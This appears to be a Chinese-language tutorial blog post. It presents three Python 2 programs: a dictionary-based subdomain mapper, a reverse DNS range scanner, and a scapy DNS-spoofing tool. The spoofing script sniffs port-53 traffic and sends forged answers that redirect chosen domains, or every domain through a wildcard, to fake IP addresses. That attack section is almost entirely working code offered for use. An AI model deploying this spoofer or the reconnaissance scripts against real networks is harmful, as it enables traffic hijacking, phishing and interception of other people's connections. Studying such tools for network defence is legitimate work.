[Python] DNS-Related Python Program

1.DNS Dictionary Mapper

先建立一个文档，里面保存待测网站的子域名，程序会逐行取出，并且与域名做字符串拼接，随后调用socket.gethostbyname(),它的作用是接收一个域名，如果该域名真实存在就返回相应的IP地址。

源码如下：

import sys
import socket

if len(sys.argv) < 3:
print sys.argv[0] + ": <dict_file> <domain>"
sys.exit(1)

def do_dns_lookup(name):
try:
print name + ": " + socket.gethostbyname(name)
except socket.gaierror, e:
print name + ": " + str(e)

try:
fh = open(sys.argv[1], "r")
for word in fh.readlines():
do_dns_lookup(word.strip() + "." + sys.argv[2])
fh.close()
except:
print "Cannot read dictionary " + sys.argv[1]

字典如下：



运行结果如下：



2.Reverse DNS Scanner

此程序的命令结构为python test.py <start_ip>-<stop_ip>

程序的关键就是调用socket.gethostbyaddr(),它会接受一个IP地址然后返回其对应的域名。但值得注意的是，不是所有的查询都会返回正确的结果。

源码：

import sys
import socket
from random import randint

if len(sys.argv) < 2:
print sys.argv[0] + ": <start_ip>-<stop_ip>"
sys.exit(1)

def get_ips(start_ip,stop_ip):
ips = []

tmp = []
for i in start_ip.split('.'):
tmp.append("%02X" % long(i))

start_dec = long(''.join(tmp), 16)

tmp = []
for i in stop_ip.split('.'):
tmp.append("%02X" % long(i))
stop_dec = long(''.join(tmp), 16)

while (start_dec < stop_dec + 1):
bytes = []
bytes.append(str(int(start_dec / 16777216)))
rem = start_dec % 16777216
bytes.append(str(int(rem / 65536)))
rem = rem % 65536
bytes.append(str(int(rem / 256)))
rem = rem % 256
bytes.append(str(rem))
ips.append(".".join(bytes))
start_dec += 1
return ips

def dns_reverse_lookup(start_ip, stop_ip):
ips = get_ips(start_ip, stop_ip)

while len(ips) > 0:
i = randint(0, len(ips)-1)
lookup_ip = str(ips[i])

try:
print lookup_ip + ": " + str(socket.gethostbyaddr(lookup_ip)[0])
except (socket.herror, socket.error):
pass

del ips[i]

start_ip, stop_ip = sys.argv[1].split('-')
dns_reverse_lookup(start_ip, stop_ip)

程序运行过程：



3.DNS-Spoofing

DNS欺骗的原理与ARP欺骗相似，攻击者将编造的IP作为某个DNS请求的响应包，并且希望自己的包比真正域名服务器的解答更早的到达。

具体地，程序用sniff()嗅探网络流量，得到目的或者源为53的UDP包。

另外还需要一个host文件指明被攻击的网址以及对应的假IP。

源代码：

import sys
import getopt
import scapy.all as scapy

dev = "eth0"
filter = "udp port 53"
file = None
dns_map = {}

def handle_packet(packet):
ip = packet.getlayer(scapy.IP)
udp = packet.getlayer(scapy.UDP)
dns = packet.getlayer(scapy.DNS)

# standard (a record) dns query
if dns.qr == 0 and dns.opcode == 0:
queried_host = dns.qd.qname[:-1]
resolved_ip = None

if dns_map.get(queried_host):
resolved_ip = dns_map.get(queried_host)
elif dns_map.get('*'):
resolved_ip = dns_map.get('*')

if resolved_ip:
dns_answer = scapy.DNSRR(rrname=queried_host + ".", ttl=330, type="A", rclass="IN",rdata=resolved_ip)
dns_reply = scapy.IP(src=ip.dst, dst=ip.src) / scapy.UDP(sport=udp.dport,dport=udp.sport) / scapy.DNS(id=dns.id, qr=1, aa=0, rcode=0, qd=dns.qd, an=dns_answer)
print "Send %s has %s to %s" % (queried_host,resolved_ip,ip.src)
scapy.send(dns_reply, iface=dev)

def usage():
print sys.argv[0] + " -f <hosts-file> -i <dev>"
sys.exit(1)

def parse_host_file(file):
for line in open(file):
line = line.rstrip('\n')

if line:
(ip,host) = line.split()
dns_map[host] = ip

try:
cmd_opts = "f:i:"
opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
except getopt.GetoptError:
usage()

for opt in opts:
if opt[0] == "-i":
dev = opt[1]
elif opt[0] == "-f":
file = opt[1]
else:
usage()

if file:
parse_host_file(file)
else:
usage()

print "Spoofing DNS requests on %s" % (dev)
scapy.sniff(iface=dev, filter=filter, prn=handle_packet)

host文件：



程序执行过程：



最终效果：